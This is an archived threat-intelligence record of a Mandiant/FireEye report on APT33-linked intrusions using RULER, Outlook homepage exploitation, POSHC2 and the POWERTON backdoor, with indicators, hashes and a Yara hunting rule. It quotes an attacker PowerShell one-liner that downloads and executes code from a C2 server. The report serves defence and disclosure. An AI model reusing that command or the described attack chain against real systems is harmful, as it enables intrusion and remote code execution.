{ "id": "6857b892-6953-432b-9865-469e8d7834ae", "created_at": "2026-04-06T00:07:51.919473Z", "updated_at": "2026-04-10T13:12:37.612181Z", "deleted_at": null, "sha1_hash": "1fc6791fb71ecfa5313ee905ad90932325dbacd5", "title": "OVERRULED: Containing a Potentially Destructive Adversary | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1032306, "plain_text": "OVERRULED: Containing a Potentially Destructive Adversary |\r\nMandiant\r\nBy Mandiant\r\nPublished: 2018-12-21 · Archived: 2026-04-05 18:16:24 UTC\r\nWritten by: Geoff Ackerman, Rick Cole, Andrew Thompson, Alex Orleans, Nick Carr\r\nUPDATE (Jul. 3, 2019): On May 16, 2019 FireEye's Advanced Practices team attributed the remaining \"suspected APT33\r\nactivity\" (referred to as GroupB in this blog post) to APT33, operating at the behest of the Iranian government. The malware\r\nand tradecraft in this blog post are consistent with the June 2019 intrusion campaign targeting U.S. federal government\r\nagencies and financial, retail, media, and education sectors – as well as U.S. Cyber Command's July 2019 CVE-2017-11774\r\nindicators, which FireEye also attributes to APT33. FireEye's rigorous process for clustering and attributing this activity is\r\nalso explored in this blog's \"Identifying the Overlap\" section.\r\nIntroduction\r\nFireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry.\r\nPublic reporting indicates this activity may be related to recent destructive attacks. FireEye's Managed Defense has\r\nresponded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in\r\nearly phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an\r\nattempt to circumvent our detection.\r\nOn Sept. 20, 2017, FireEye Intelligence published a blog post detailing spear phishing activity targeting Energy and\r\nAerospace industries. Recent public reporting indicated possible links between the confirmed APT33 spear phishing and\r\ndestructive SHAMOON attacks; however, we were unable to independently verify this claim. FireEye’s Advanced Practices\r\nteam leverages telemetry and aggressive proactive operations to maintain visibility of APT33 and their attempted intrusions\r\nagainst our customers. These efforts enabled us to establish an operational timeline that was consistent with multiple\r\nintrusions Managed Defense identified and contained prior to the actor completing their mission. We correlated the\r\nintrusions using an internally-developed similarity engine described below. Additionally, public discussions have also\r\nindicated that specific attacker infrastructure we observed is possibly related to the recent destructive SHAMOON attacks.\r\n45 days ago, during 24x7 monitoring, #ManagedDefense detected \u0026 contained an attempted intrusion from newly-identified adversary infrastructure*. It is C2 for a code family we track as POWERTON.\r\n*hxxps://103.236.149[.]100/api/info — FireEye (@FireEye) December 15, 2018\r\nIdentifying the Overlap in Threat Activity\r\nFireEye augments our expertise with an internally-developed similarity engine to evaluate potential associations and\r\nrelationships between groups and activity. Using concepts from document clustering and topic modeling literature, this\r\nengine provides a framework to calculate and discover similarities between groups of activities, and then develop\r\ninvestigative leads for follow-on analysis. Our engine identified similarities between a series of intrusions within the\r\nengineering industry. The near real-time results led to an in-depth comparative analysis. FireEye analyzed all available\r\norganic information from numerous intrusions and all known APT33 activity. We subsequently concluded, with medium\r\nconfidence, that two specific early-phase intrusions were the work of a single group. Advanced Practices then reconstructed\r\nan operational timeline based on confirmed APT33 activity observed in the last year. We compared that to the timeline of the\r\ncontained intrusions and determined there were circumstantial overlaps to include remarkable similarities in tool selection\r\nduring specified timeframes. We assess with low confidence that the intrusions were conducted by APT33. This blog\r\ncontains original source material only, whereas Finished Intelligence including an all-source analysis is available within our\r\nintelligence portal. To best understand the techniques employed by the adversary, it is necessary to provide background on\r\nour Managed Defense response to this activity during their 24x7 monitoring.\r\nManaged Defense Rapid Responses: Investigating the Attacker\r\nIn mid-November 2017, Managed Defense identified and responded to targeted threat activity at a customer within the\r\nengineering industry. The adversary leveraged stolen credentials and a publicly available tool, SensePost’s RULER, to\r\nconfigure a client-side mail rule crafted to download and execute a malicious payload from an adversary-controlled\r\nWebDAV server 85.206.161[.]214@443\\outlook\\live.exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f).\r\nThe payload was an AutoIT downloader that retrieved and executed additional PowerShell from\r\nhxxps://85.206.161[.]216:8080/HomePage.htm. The follow-on PowerShell profiled the target system’s architecture,\r\ndownloaded the appropriate variant of PowerSploit (MD5: c326f156657d1c41a9c387415bf779d4 or\r\n0564706ec38d15e981f71eaf474d0ab8), and reflectively loaded PUPYRAT (MD5: 94cd86a0a4d747472c2b3f1bc3279d77 or\r\nhttps://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html\r\nPage 1 of 7\n\n17587668AC577FCE0B278420B8EB72AC). The actor leveraged a publicly available exploit for CVE-2017-0213 to\r\nescalate privileges, publicly available Windows SysInternals PROCDUMP to dump the LSASS process, and publicly\r\navailable MIMIKATZ to presumably steal additional credentials. Managed Defense aided the victim in containing the\r\nintrusion.\r\nFireEye collected 168 PUPYRAT samples for a comparison. While import hashes (IMPHASH) are insufficient for\r\nattribution, we found it remarkable that out of the specified sampling, the actor’s IMPHASH was found in only six samples,\r\ntwo of which were confirmed to belong to the threat actor observed in Managed Defense, and one which is attributed to\r\nAPT33. We also determined APT33 likely transitioned from PowerShell EMPIRE to PUPYRAT during this timeframe.\r\nIn mid-July of 2018, Managed Defense identified similar targeted threat activity focused against the same industry. The\r\nactor leveraged stolen credentials and RULER’s module that exploits CVE-2017-11774 (RULER.HOMEPAGE), modifying\r\nnumerous users’ Outlook client homepages for code execution and persistence. These methods are further explored in this\r\npost in the \"RULER In-The-Wild\" section.\r\nThe actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available\r\n.NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Managed\r\nDefense rapidly engaged and successfully contained the intrusion. Of note, Advanced Practices separately established that\r\nAPT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018.\r\nDuring the July activity, Managed Defense observed three variations of the homepage exploit hosted at\r\nhxxp://91.235.116[.]212/index.html. One example is shown in Figure 1.\r\nFigure 1: Attacker’s homepage exploit (CVE-2017-11774)\r\nThe main encoded payload within each exploit leveraged WMIC to conduct system profiling in order to determine the\r\nappropriate OS-dependent POSHC2 implant and dropped to disk a PowerShell script named “Media.ps1” within the user’s\r\n%LOCALAPPDATA% directory (%LOCALAPPDATA%\\MediaWs\\Media.ps1) as shown in Figure 2.\r\nFigure 2: Attacker’s “Media.ps1” script\r\nThe purpose of “Media.ps1” was to decode and execute the downloaded binary payload, which was written to disk as\r\n“C:\\Users\\Public\\Downloads\\log.dat”. At a later stage, this PowerShell script would be configured to persist on the host via\r\na registry Run key.\r\nhttps://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html\r\nPage 2 of 7\n\nAnalysis of the “log.dat” payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager\r\nwritten to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These\r\nparticular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings. The\r\nimplant will send a reconnaissance report via HTTP to the C2 server (hxxps://51.254.71[.]223/images/static/content/) and\r\nsubsequently evaluate the response as PowerShell source code. The reconnaissance report contains the following\r\ninformation:\r\nUsername and domain\r\nComputer name\r\nCPU details\r\nCurrent exe PID\r\nConfigured C2 server\r\nThe C2 messages are encrypted via AES using a hardcoded key and encoded with Base64. It is this POSHC2 binary that\r\nestablished persistence for the aforementioned “Media.ps1” PowerShell script, which then decodes and executes the\r\nPOSHC2 binary upon system startup. During the identified July 2018 activity, the POSHC2 variants were configured with a\r\nkill date of July 29, 2018.\r\nPOSHC2 was leveraged to download and execute a new PowerShell-based implant self-named POWERTON\r\n(hxxps://185.161.209[.]172/api/info). The adversary had limited success with interacting with POWERTON during this\r\ntime. The actor was able to download and establish persistence for an AutoIt binary named “ClouldPackage.exe” (MD5:\r\n46038aa5b21b940099b0db413fa62687), which was achieved via the POWERTON “persist” command. The sole\r\nfunctionality of “ClouldPackage.exe” was to execute the following line of PowerShell code:\r\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $webclient = new-object\r\nSystem.Net.WebClient; $webclient.Credentials = new-object System.Net.NetworkCredential('public',\r\n'fN^4zJp{5w#K0VUm}Z_a!QXr*]\u00262j8Ye'); iex $webclient.DownloadString('hxxps://185.161.209[.]172/api/default')\r\nThe purpose of this code is to retrieve “silent mode” POWERTON from the C2 server. Note the actor protected their follow-on payloads with strong credentials. Shortly after this, Managed Defense contained the intrusion.\r\nStarting approximately three weeks later, the actor reestablished access through a successful password spray. Managed\r\nDefense immediately identified the actor deploying malicious homepages with RULER to persist on workstations. They\r\nmade some infrastructure and tooling changes to include additional layers of obfuscation in an attempt to avoid detection.\r\nThe actor hosted their homepage exploit at a new C2 server (hxxp://5.79.66[.]241/index.html). At least three new variations\r\nof “index.html” were identified during this period. Two of these variations contained encoded PowerShell code written to\r\ndownload new OS-dependent variants of the .NET POSHC2 binaries, as seen in Figure 3.\r\nFigure 3: OS-specific POSHC2 Downloader\r\nFigure 3 shows that the actor made some minor changes, such as encoding the PowerShell \"DownloadString\" commands\r\nand renaming the resulting POSHC2 and .ps1 files dropped to disk. Once decoded, the commands will attempt to download\r\nthe POSHC2 binaries from yet another new C2 server (hxxp://103.236.149[.]124/delivered.dat). The name of the .ps1 file\r\ndropped to decode and execute the POSHC2 variant also changed to “Vision.ps1”. During this August 2018 activity, the\r\nPOSHC2 variants were configured with a “kill date” of Aug. 13, 2018. Note that POSHC2 supports a kill date in order to\r\nguardrail an intrusion by time and this functionality is built into the framework.\r\nOnce again, POSHC2 was used to download a new variant of POWERTON (MD5: c38069d0bc79acdc28af3820c1123e53),\r\nconfigured to communicate with the C2 domain hxxps://basepack[.]org. At one point in late-August, after the POSHC2 kill\r\ndate, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages\r\npreviously observed.\r\nDue to Managed Defense’s early containment of these intrusions, we were unable to ascertain the actor’s motivations;\r\nhowever, it was clear they were adamant about gaining and maintaining access to the victim’s network.\r\nhttps://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html\r\nPage 3 of 7\n\nAdversary Pursuit: Infrastructure Monitoring\r\nAdvanced Practices conducts aggressive proactive operations in order to identify and monitor adversary infrastructure at\r\nscale. The adversary maintained a RULER.HOMEPAGE payload at hxxp://91.235.116[.]212/index.html between July 16\r\nand Oct. 11, 2018. On at least Oct. 11, 2018, the adversary changed the payload (MD5:\r\n8be06571e915ae3f76901d52068e3498) to download and execute a POWERTON sample from\r\nhxxps://103.236.149[.]100/api/info (MD5: 4047e238bbcec147f8b97d849ef40ce5). This specific URL was identified in a\r\npublic discussion as possibly related to recent destructive attacks. We are unable to independently verify this correlation with\r\nany organic information we possess.\r\nOn Dec. 13, 2018, Advanced Practices proactively identified and attributed a malicious RULER.HOMEPAGE payload\r\nhosted at hxxp://89.45.35[.]235/index.html (MD5: f0fe6e9dde998907af76d91ba8f68a05). The payload was crafted to\r\ndownload and execute POWERTON hosted at hxxps://staffmusic[.]org/transfer/view (MD5:\r\n53ae59ed03fa5df3bf738bc0775a91d9).\r\nTable 1 contains the operational timeline for the activity we analyzed.\r\nDATE/TIME (UTC) NOTE INDICATOR\r\n2017-08-15 17:06:59 APT33 – EMPIRE (Used) 8a99624d224ab3378598b9895660c890\r\n2017-09-15 16:49:59 APT33 – PUPYRAT (Compiled) 4b19bccc25750f49c2c1bb462509f84e\r\n2017-11-12 20:42:43 GroupA – AUT2EXE Downloader (Compiled) 95f3bea43338addc1ad951cd2d42eb6f\r\n2017-11-14 14:55:14 GroupA – PUPYRAT (Used) 17587668ac577fce0b278420b8eb72ac\r\n2018-01-09 19:15:16 APT33 – PUPYRAT (Compiled) 56f5891f065494fdbb2693cfc9bce9ae\r\n2018-02-13 13:35:06 APT33 – PUPYRAT (Used) 56f5891f065494fdbb2693cfc9bce9ae\r\n2018-05-09 18:28:43 GroupB – AUT2EXE (Compiled) 46038aa5b21b940099b0db413fa62687\r\n2018-07-02 07:57:40 APT33 – POSHC2 (Used) fa7790abe9ee40556fb3c5524388de0b\r\n2018-07-16 00:33:01 GroupB – POSHC2 (Compiled) 75e680d5fddbdb989812c7ba83e7c425\r\n2018-07-16 01:39:58 GroupB – POSHC2 (Used) 75e680d5fddbdb989812c7ba83e7c425\r\n2018-07-16 08:36:13 GroupB – POWERTON (Used) 46038aa5b21b940099b0db413fa62687\r\n2018-07-31 22:09:25 APT33 – POSHC2 (Used) 129c296c363b6d9da0102aa03878ca7f\r\n2018-08-06 16:27:05 GroupB – POSHC2 (Compiled) fca0ad319bf8e63431eb468603d50eff\r\n2018-08-07 05:10:05 GroupB – POSHC2 (Used) 75e680d5fddbdb989812c7ba83e7c425\r\n2018-08-29 18:14:18 APT33 – POSHC2 (Used) 5832f708fd860c88cbdc088acecec4ea\r\n2018-10-09 16:02:55 APT33 – POSHC2 (Used) 8d3fe1973183e1d3b0dbec31be8ee9dd\r\n2018-10-09 16:48:09 APT33 – POSHC2 (Used) 48d1ed9870ed40c224e50a11bf3523f8\r\n2018-10-11 21:29:22 GroupB – POWERTON (Used) 8be06571e915ae3f76901d52068e3498\r\n2018-12-13 11:00:00 GroupB – POWERTON (Identified) 99649d58c0d502b2dfada02124b1504c\r\nTable 1: Operational Timeline\r\nOutlook and Implications\r\nIf the activities observed during these intrusions are linked to APT33, it would suggest that APT33 has likely maintained\r\nproprietary capabilities we had not previously observed until sustained pressure from Managed Defense forced their use.\r\nFireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to\r\ncritical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting\r\naligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical\r\nproduction.\r\nWe will continue to track these clusters independently until we achieve high confidence that they are the same. The\r\noperators behind each of the described intrusions are using publicly available but not widely understood tools and\r\ntechniques in addition to proprietary implants as needed. Managed Defense has the privilege of being exposed to intrusion\r\nactivity every day across a wide spectrum of industries and adversaries. This daily front line experience is backed by\r\nAdvanced Practices, FireEye Labs Advanced Reverse Engineering (FLARE), and FireEye Intelligence to give our clients\r\nhttps://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html\r\nPage 4 of 7\n\nevery advantage they can have against sophisticated adversaries. We welcome additional original source information we can\r\nevaluate to confirm or refute our analytical judgements on attribution.\r\nCustom Backdoor: POWERTON\r\nPOWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a\r\nsimilar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence\r\nmechanisms, including WMI and auto-run registry key. Communications with the C2 are over TCP/HTTP(S) and leverage\r\nAES encryption for communication traffic to and from the C2. POWERTON typically gets deployed as a later stage\r\nbackdoor and is obfuscated several layers.\r\nFireEye has witnessed at least two separate versions of POWERTON, tracked separately as POWERTON.v1 and\r\nPOWERTON.v2, wherein the latter has improved its command and control functionality, and integrated the ability to dump\r\npassword hashes.\r\nTable 2 contains samples of POWERTON.\r\nHash of Obfuscated File (MD5) Hash of Deobfuscated File (MD5) Version\r\n974b999186ff434bee3ab6d61411731f 3871aac486ba79215f2155f32d581dc2 V1\r\ne2d60bb6e3e67591e13b6a8178d89736 2cd286711151efb61a15e2e11736d7d2 V1\r\nbd80fcf5e70a0677ba94b3f7c011440e 5a66480e100d4f14e12fceb60e91371d V1\r\n4047e238bbcec147f8b97d849ef40ce5 f5ac89d406e698e169ba34fea59a780e V2\r\nc38069d0bc79acdc28af3820c1123e53 4aca006b9afe85b1f11314b39ee270f7 V2\r\nN/A 7f4f7e307a11f121d8659ca98bc8ba56 V2\r\n53ae59ed03fa5df3bf738bc0775a91d9 99649d58c0d502b2dfada02124b1504c V2\r\nTable 2: POWERTON malware samples\r\nAdversary Methods: Email Exploitation on the Rise\r\nOutlook and Exchange are ubiquitous with the concept of email access. User convenience is a primary driver behind\r\ntechnological advancements, but convenient access for users often reveals additional attack surface for adversaries. As\r\norganizations expose any email server access to the public internet for its users, those systems become intrusion vectors.\r\nFireEye has observed an increase in targeted adversaries challenging and subverting security controls on Exchange and\r\nOffice365. Our Mandiant consultants also presented several new methods used by adversaries to subvert multifactor\r\nauthentication at FireEye Cyber Defense Summit 2018.\r\nAt FireEye, our decisions are data driven, but data provided to us is often incomplete and missing pieces must be inferred\r\nbased on our expertise in order for us to respond to intrusions effectively. A plausible scenario for exploitation of this vector\r\nis as follows.\r\nAn adversary has a single pair of valid credentials for a user within your organization obtained through any means, to\r\ninclude the following non-exhaustive examples:\r\nThird party breaches where your users have re-used credentials; does your enterprise leverage a naming standard for\r\nemail addresses such as first.last@yourorganization.tld? It is possible that a user within your organization has a\r\npersonal email address with a first and last name--and an affiliated password--compromised in a third-party breach\r\nsomewhere. Did they re-use that password?\r\nPrevious compromise within your organization where credentials were compromised but not identified or reset.\r\nPoor password choice or password security policies resulting in brute-forced credentials.\r\nGathering of crackable password hashes from various other sources, such as NTLM hashes gathered via documents\r\nintended to phish them from users.\r\nCredential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently\r\nelsewhere on the internet.\r\nOnce the adversary has legitimate credentials, they identify publicly accessible Outlook Web Access (OWA) or Office 365\r\nthat is not protected with multi-factor authentication. The adversary leverages the stolen credentials and a tool like RULER\r\nto deliver exploits through Exchange’s legitimate features.\r\nRULER In-The-Wild: Here, There, and Everywhere\r\nSensePost’s RULER is a tool designed to interact with Exchange servers via a messaging application programming interface\r\n(MAPI), or via remote procedure calls (RPC), both over HTTP protocol. As detailed in the \"Managed Defense Rapid\r\nhttps://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html\r\nPage 5 of 7\n\nResponses\" section, in mid-November 2017, FireEye witnessed network activity generated by an existing Outlook email\r\nclient process on a single host, indicating connection via Web Distributed Authoring and Versioning (WebDAV) to an\r\nadversary-controlled IP address 85.206.161[.]214. This communication retrieved an executable created with Aut2Exe (MD5:\r\n95f3bea43338addc1ad951cd2d42eb6f), and executed a PowerShell one-liner to retrieve further malicious content.\r\nWithout the requisite logging from the impacted mailbox, we can still assess that this activity was the result of a malicious\r\nmail rule created using the aforementioned tooling for the following reasons:\r\nOutlook.exe directly requested the malicious executable hosted at the adversary IP address over WebDAV. This is\r\nunexpected unless some feature of Outlook directly was exploited; traditional vectors like phishing would show a\r\nprocess ancestry where Outlook spawned a child process of an Office product, Acrobat, or something similar. Process\r\ninjection would imply prior malicious code execution on the host, which evidence did not support.\r\nThe transfer of 95f3bea43338addc1ad951cd2d42eb6f was over WebDAV. RULER facilitates this by exposing a\r\nsimple WebDAV server, and a command line module for creating a client-side mail rule to point at that WebDAV\r\nhosted payload.\r\nThe choice of WebDAV for this initial transfer of stager is the result of restrictions in mail rule creation; the payload\r\nmust be \"locally\" accessible before the rule can be saved, meaning protocol handlers for something like HTTP or\r\nFTP are not permitted. This is thoroughly detailed in Silent Break Security's initial write-up prior to RULER’s\r\ncreation. This leaves SMB and WebDAV via UNC file pathing as the available options for transferring your\r\nmalicious payload via an Outlook Rule. WebDAV is likely the less alerting option from a networking perspective, as\r\none is more likely to find WebDAV transactions occurring over ports 80 and 443 to the internet than they are to find a\r\ndomain joined host communicating via SMB to a non-domain joined host at an arbitrary IP address.\r\nThe payload to be executed via Outlook client-side mail rule must contain no arguments, which is likely why a\r\ncompiled Aut2exe executable was chosen. 95f3bea43338addc1ad951cd2d42eb6f does nothing but execute a\r\nPowerShell one-liner to retrieve additional malicious content for execution. However, execution of this command\r\nnatively using an Outlook rule was not possible due to this limitation.\r\nWith that in mind, the initial infection vector is illustrated in Figure 4.\r\nFigure 4: Initial infection vector\r\nAs both attackers and defenders continue to explore email security, publicly-released techniques and exploits are quickly\r\nadopted. SensePost's identification and responsible disclosure of CVE-2017-11774 was no different. For an excellent\r\ndescription of abusing Outlook's home page for shell and persistence from an attacker’s perspective, refer to SensePost's\r\nblog.\r\nFireEye has observed and documented an uptick in several malicious attackers' usage of this specific home page exploitation\r\ntechnique. Based on our experience, this particular method may be more successful due to defenders misinterpreting\r\nartifacts and focusing on incorrect mitigations. This is understandable, as some defenders may first learn of successful CVE-2017-11774 exploitation when observing Outlook spawning processes resulting in malicious code execution. When this\r\nobservation is\r\ncombined with standalone forensic artifacts that may look similar to malicious HTML Application (.hta) attachments, the\r\nevidence may be misinterpreted as initial infection via a phishing email. This incorrect assumption overlooks the fact that\r\nattackers require valid credentials to deploy CVE-2017-11774, and thus the scope of the compromise may be greater than\r\nindividual users' Outlook clients where home page persistence is discovered. To assist defenders, we're including a Yara rule\r\nto differentiate these Outlook home page payloads at the end of this post.\r\nhttps://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html\r\nPage 6 of 7\n\nUnderstanding this nuance further highlights the exposure to this technique when combined with password spraying as\r\ndocumented with this attacker, and underscores the importance of layered email security defenses, including multi-factor\r\nauthentication and patch management. We recommend the organizations reduce their email attack surface as much as\r\npossible. Of note, organizations that choose to host their email with a cloud service provider must still ensure the software\r\nclients used to access that server are patched. Beyond implementing multi-factor authentication for Outlook 365/Exchange\r\naccess, the Microsoft security updates in Table 3 will assist in mitigating known and documented attack vectors that are\r\nexposed for exploitation by toolkits such as SensePost’s RULER.\r\nTable 3: Outlook attack surface mitigations\r\nDetecting the Techniques\r\nFireEye detected this activity across our platform, including named detection for POSHC2, PUPYRAT, and POWERTON.\r\nTable 4 contains several specific detection names that applied to the email exploitation and initial infection activity.\r\nPLATFORM SIGNATURE NAME\r\nEndpoint\r\nSecurity\r\nPOWERSHELL ENCODED REMOTE DOWNLOAD (METHODOLOGY)SUSPICIOUS POWERSHELL USAGE (METHODOLO\r\nSTEALER)RULER OUTLOOK PERSISTENCE (UTILITY)\r\nNetwork and\r\nEmail\r\nSecurity\r\nFE_Exploit_HTML_CVE201711774FE_HackTool_Win_RULERFE_HackTool_Linux_RULERFE_HackTool_OSX_RULERFE_Tro\r\n(Network Traffic)\r\nTable 4: FireEye product detections\r\nFor organizations interested in hunting for Outlook home page shell and persistence, we’ve included a Yara rule that can also\r\nbe used for context to differentiate these payloads from other scripts:\r\nrule Hunting_Outlook_Homepage_Shell_and_Persistence\r\n{\r\nmeta:\r\n author = \"Nick Carr (@itsreallynick)\"\r\n reference_hash = \"506fe019d48ff23fac8ae3b6dd754f6e\"\r\n strings:\r\n $script_1 = \"\u003chtm\" ascii nocase wide\r\n $script_2 = \"\u003cscript\" ascii nocase wide\r\n $viewctl1_a = \"ViewCtl1\" ascii nocase wide\r\n $viewctl1_b = \"0006F063-0000-0000-C000-000000000046\" ascii wide\r\n $viewctl1_c = \".OutlookApplication\" ascii nocase wide\r\n condition:\r\n uint16(0) != 0x5A4D and all of ($script*) and any of ($viewctl1*)\r\n}\r\nAcknowledgements\r\nThe authors would like to thank Matt Berninger for providing data science support for attribution augmentation projects,\r\nOmar Sardar (FLARE) for reverse engineering POWERTON, and Joseph Reyes (FireEye Labs) for continued\r\ncomprehensive Outlook client exploitation product coverage.\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html\r\nhttps://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MITRE", "ETDA" ], "origins": [ "web" ], "references": [ "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html" ], "report_names": [ "overruled-containing-a-potentially-destructive-adversary.html" ], "threat_actors": [ { "id": "a63c994f-d7d6-4850-a881-730635798b90", "created_at": "2025-08-07T02:03:24.788883Z", "updated_at": "2026-04-10T02:00:03.785146Z", "deleted_at": null, "main_name": "COBALT TRINITY", "aliases": [ "APT33 ", "Elfin ", "HOLMIUM ", "MAGNALIUM ", "Peach Sandstorm ", "Refined Kitten ", "TA451 " ], "source_name": "Secureworks:COBALT TRINITY", "tools": [ "AutoCore", "Cadlotcorg", "Dello RAT", "FalseFont", "Imminent Monitor", "KDALogger", "Koadic", "NanoCore", "NetWire", "POWERTON", "PoshC2", "Poylog", "PupyRAT", "Schoolbag" ], "source_id": "Secureworks", "reports": null }, { "id": "e5ff825b-0456-4013-b90a-971b93def74a", "created_at": "2022-10-25T15:50:23.824058Z", "updated_at": "2026-04-10T02:00:05.377261Z", "deleted_at": null, "main_name": "APT33", "aliases": [ "APT33", "HOLMIUM", "Elfin", "Peach Sandstorm" ], "source_name": "MITRE:APT33", "tools": [ "PowerSploit", "AutoIt backdoor", "PoshC2", "Mimikatz", "NanoCore", "DEADWOOD", "StoneDrill", "POWERTON", "LaZagne", "TURNEDUP", "NETWIRE", "Pupy", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "b23e717c-0b27-47e0-b3c8-4defe6dd857f", "created_at": "2023-01-06T13:46:38.367369Z", "updated_at": "2026-04-10T02:00:02.945356Z", "deleted_at": null, "main_name": "APT33", "aliases": [ "Elfin", "MAGNALLIUM", "HOLMIUM", "COBALT TRINITY", "G0064", "ATK35", "Peach Sandstorm", "TA451", "APT 33", "Refined Kitten" ], "source_name": "MISPGALAXY:APT33", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434071, "ts_updated_at": 1775826757, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/1fc6791fb71ecfa5313ee905ad90932325dbacd5.pdf", "text": "https://archive.orkl.eu/1fc6791fb71ecfa5313ee905ad90932325dbacd5.txt", "img": "https://archive.orkl.eu/1fc6791fb71ecfa5313ee905ad90932325dbacd5.jpg" } }